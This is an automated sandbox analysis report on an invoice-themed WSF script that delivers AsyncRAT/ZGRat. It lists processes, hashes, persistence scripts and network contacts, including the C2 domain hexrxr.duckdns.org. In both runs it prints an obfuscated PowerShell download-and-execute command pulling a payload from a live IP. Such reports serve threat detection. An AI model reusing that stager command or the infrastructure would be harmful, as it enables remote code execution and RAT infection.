Malware Analysis Report

2025-08-10 19:35

Sample ID 231115-v6w45sec8w
Target 16112023_0136_15112023_Invoice#2356876431.wsf
SHA256 ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292
Tags
asyncrat zgrat sended@ rat
score
10/10

Analysis Overview

score
10/10

SHA256

ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292

Threat Level: Known bad

The file 16112023_0136_15112023_Invoice#2356876431.wsf was found to be: Known bad.

Malicious Activity Summary

asyncrat zgrat sended@ rat

Detect ZGRat V1

AsyncRat

ZGRat

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 17:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 17:36

Reported

2023-11-15 17:39

Platform

win7-20231020-en

Max time kernel

128s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

C:\Windows\system32\taskeng.exe

taskeng.exe {04BBFF73-310B-4225-8D31-ECFFDE1F3BAA} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Public\Conted.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"

Network

Country Destination Domain Proto
FR 185.81.157.213:222 185.81.157.213 tcp
FR 185.81.157.213:222 185.81.157.213 tcp

Files

C:\Users\Public\Conted.vbs

MD5 110da9d3474ba64fa1a18c173685c25d
SHA1 9f093829518a9268bf9807fda7bef47e7832c497
SHA256 a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512 ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

C:\Users\Public\Conted.bat

MD5 759278dd3dc3679bf7efd1ec681c0aa1
SHA1 72b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256 cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA512 8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ac117302088a7284ccfb6957fc077861
SHA1 220d28d0668f1e28ac909561699636c848cd408e
SHA256 69154fb9bbdd28ec9c76d63ef9951ccb79ddcf4d37bb7e8d541a350ad979ab80
SHA512 f71021ad06ea17ddc3f619b196417afd96543a6613ff728038a588ba50651e434c6bb1f3c92f3e9d39fc0b401e7177e7dbcb222bccd93aa2caaca39d631865a4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZAWLLO1RJ69GAIO7DTX2.temp

MD5 d82ad5696b449dbe82226c731261a824
SHA1 385f9e07d795046e2d7ee64a8078166fb5a56326
SHA256 0b2fa9154e3620d3417a0adb0f90f530dc5d5866292a5bcaa3fbb50c41563348
SHA512 24721b2fb8fd37b0736ff97a6640647d17af6c05c928db8e1b816cda1ce2c706bb6ef53901565af2af44db1f1d289a1567cb39dd65deff7de6297bdc2f605aef

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-15 17:36

Reported

2023-11-15 17:39

Platform

win10v2004-20231020-en

Max time kernel

148s

Max time network

160s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1976 set thread context of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2500 wrote to memory of 4292 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2500 wrote to memory of 4292 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 1624 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3400 wrote to memory of 1624 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1624 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1976 wrote to memory of 3984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
FR 185.81.157.213:222 185.81.157.213 tcp
US 8.8.8.8:53 213.157.81.185.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FR 185.81.157.213:222 185.81.157.213 tcp
US 8.8.8.8:53 198.52.96.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 135.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 32.144.221.88.in-addr.arpa udp
US 8.8.8.8:53 254.20.238.8.in-addr.arpa udp
US 8.8.8.8:53 192.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 hexrxr.duckdns.org udp
FR 185.81.157.213:6606 hexrxr.duckdns.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_japlqqsa.qnw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\Conted.vbs

MD5 110da9d3474ba64fa1a18c173685c25d
SHA1 9f093829518a9268bf9807fda7bef47e7832c497
SHA256 a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512 ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

C:\Users\Public\Conted.bat

MD5 759278dd3dc3679bf7efd1ec681c0aa1
SHA1 72b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256 cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA512 8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

C:\Users\Public\Conted.ps1

MD5 ba03b4e7a4ad2bd4a2f5bce388d8f489
SHA1 f71681ee8115d4349084ad5c26e790a926bbea84
SHA256 d6b98f02b41a30cd4578acfd549e2d6fe64036f00c1830193d342c0454068b5a
SHA512 6dc307567baa0a1def8b9e480477985ccbdb7e5628c4d972a5804b282006d0717ddd728c449f8fbfcd2669a1a868c516d5924ab3a1f3d1b8e4bd1272fc04c665
